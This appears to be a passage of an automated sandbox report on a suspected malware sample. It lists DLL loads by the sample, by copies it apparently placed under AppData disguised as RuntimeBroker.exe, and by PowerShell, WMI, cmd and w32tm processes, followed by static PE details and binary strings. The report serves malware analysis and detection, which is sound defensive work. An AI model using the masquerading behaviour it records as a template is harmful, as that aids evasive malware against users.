Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\ogVinh0jhq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ogVinh0jhq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ogVinh0jhq.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: ogVinh0jhq.exe

Static file information: File size 1453056 > 1048576

Source: ogVinh0jhq.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x15f200

Source: ogVinh0jhq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp
